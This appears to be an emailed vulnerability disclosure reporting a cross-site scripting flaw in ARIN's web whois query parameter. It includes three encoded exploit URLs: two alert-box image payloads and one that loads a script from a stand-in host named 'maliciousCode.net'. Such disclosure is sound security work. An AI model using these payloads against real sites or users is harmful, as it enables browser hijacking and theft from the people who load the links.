<HTML dir=ltr><HEAD></HEAD>
<BODY>
<DIV><FONT face=Arial color=#000000 size=2><STRONG>Title</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT size=2><FONT face=Arial>ARIN.NET input validation holes in "?queryinput=" allows remote users conduct cross-site scripting attacks</FONT><BR></FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT size=2><STRONG>Notification</STRONG><BR>Multiple attempts to contact Arin site administrators went unanswered</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2></FONT> </DIV>
<DIV><FONT size=2><FONT face=Arial><STRONG>Exploit Included:</STRONG> Yes</FONT></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2><STRONG>Description</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>The "?queryinput=" script does not properly validate user-supplied input in several parameters to filter HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. </FONT><BR></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>Some demonstration exploit URLs are provided:</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><A href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E" target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A><BR><A href="http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E" target=_blank>http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E</A><BR><A href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E" target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><BR>Discovered by Terminal Entry security [.at.] peadro (.)net<BR><BR></DIV></FONT></BODY><!--[object_id=#peadro.net#]--><P>
<HR>
<EM><FONT face=Arial size=2>This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.</FONT></EM></P></HTML>